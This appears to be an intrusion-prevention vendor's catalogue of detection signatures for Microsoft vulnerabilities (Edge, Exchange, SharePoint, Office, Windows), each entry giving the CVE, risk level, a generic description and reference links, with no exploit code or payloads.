About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a security bypass vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612

References:

CVE-2019-0612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0612

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639

References:

CVE-2019-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0639

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769

References:

CVE-2019-0769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0769

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773

References:

CVE-2019-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0773

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829

References:

CVE-2019-0829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0829

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911

References:

CVE-2019-0911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0911

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989

References:

CVE-2019-0989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0989

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991

References:

CVE-2019-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0991

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992

References:

CVE-2019-0992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0992

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993

References:

CVE-2019-0993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0993

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003

References:

CVE-2019-1003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024

References:

CVE-2019-1024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1024

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051

References:

CVE-2019-1051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1051

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139

References:

CVE-2019-1139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1139

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140

References:

CVE-2019-1140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1140

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141

References:

CVE-2019-1141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1141

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195

References:

CVE-2019-1195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1195

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196

References:

CVE-2019-1196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1196

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197

References:

CVE-2019-1197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1197

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1195-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307

References:

CVE-2019-1307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1307

ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1195-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308

References:

CVE-2019-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1308

ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1195-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366

References:

CVE-2019-1366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1366

ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219

References:

CVE-2020-1219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1219

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609

References:

CVE-2019-0609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0609

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806

References:

CVE-2019-0806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0806

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926

References:

CVE-2019-0926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0926

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940

References:

CVE-2019-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0940

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052

References:

CVE-2019-1052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1052

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange Server detected

Risk:

High

First detected in:

sgpkg-ips-1327-5242

Last changed:

sgpkg-ips-1327-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An attempt to exploit an insecure deserialization vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857

References:

CVE-2021-26857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26857

ms21-mar
http://technet.microsoft.com/security/bulletin/ms21-mar

Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-28482

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange Server detected

Risk:

High

First detected in:

sgpkg-ips-1346-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An attempt to exploit an insecure deserialization vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary code execution.

Situation:

File-TextId_Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28482
File-TextId_Microsoft_Exchange_Suspicious-Request_CVE-2021-28482

References:

CVE-2021-28482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28482

Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange Server detected

Risk:

High

First detected in:

sgpkg-ips-1342-5242

Last changed:

sgpkg-ips-1342-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An attempt to exploit a remote code execution vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_SHS-Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480

References:

CVE-2021-28480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28480

Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1191-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367

References:

CVE-2019-1367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1367

ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep

Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a directory traversal vulnerability in Microsoft Office. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801

References:

CVE-2019-0801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0801

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Outlook. Successful exploitation of this issue can result in remote code execution.

Situation:

File-OLE_Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199

References:

CVE-2019-1199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1199

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380

About this vulnerability:

A memory corruption vulnerability in Microsoft Scripting

Risk:

High

First detected in:

sgpkg-ips-1269-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Use-after-free

Description:

There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380

References:

CVE-2020-1380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1380

ms20-aug
http://technet.microsoft.com/security/bulletin/ms20-aug

Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1269-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570

References:

CVE-2020-1570
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1570

ms20-aug
http://technet.microsoft.com/security/bulletin/ms20-aug

Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959

About this vulnerability:

A vulnerability in Windows Scripting engine

Risk:

High

First detected in:

sgpkg-ips-1356-5242

Last changed:

sgpkg-ips-1356-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Windows Scripting Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959

References:

CVE-2021-31959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31959

ms21-jun
http://technet.microsoft.com/security/bulletin/ms21-jun

Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

Low

First detected in:

sgpkg-ips-1512-5242

Last changed:

sgpkg-ips-1512-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

An attempt to exploit a deserialization vulnerability in Microsoft Sharepoint was detected. Successful exploitation of this issue can result in remote code execution.

Situation:

File-TextId_Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053

References:

CVE-2022-38053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38053

ms22-oct
http://technet.microsoft.com/security/bulletin/ms22-oct

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-1187-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257

References:

CVE-2019-1257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1257

ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-1187-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.

Situation:

HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295

References:

CVE-2019-1295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1295

ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-1187-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296

References:

CVE-2019-1296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1296

ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-1290-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

There exists a server-side include (SSI) vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.

Situation:

HTTP_CS-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952

References:

CVE-2020-16952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16952

ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-1347-5242

Last changed:

sgpkg-ips-1347-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.

Situation:

HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181

References:

CVE-2021-31181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31181

ms21-may
http://technet.microsoft.com/security/bulletin/ms21-may

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467

About this vulnerability:

A vulnerability in Microsoft Sharepoint

Risk:

High

First detected in:

sgpkg-ips-1367-5242

Last changed:

sgpkg-ips-1367-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.

Situation:

HTTP_CSU-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467

References:

CVE-2021-34467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34467

ms21-jul
http://technet.microsoft.com/security/bulletin/ms21-jul

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Sharepoint detected

Risk:

High

First detected in:

sgpkg-ips-1395-5242

Last changed:

sgpkg-ips-1395-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Sharepoint detected.

Situation:

File-Binary_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487

References:

CVE-2021-40487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40487

Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a buffer over read vulnerability in Microsoft Windows. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Binary_Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758

References:

CVE-2019-0758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0758

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1215-5242

Last changed:

sgpkg-ips-1296-5242
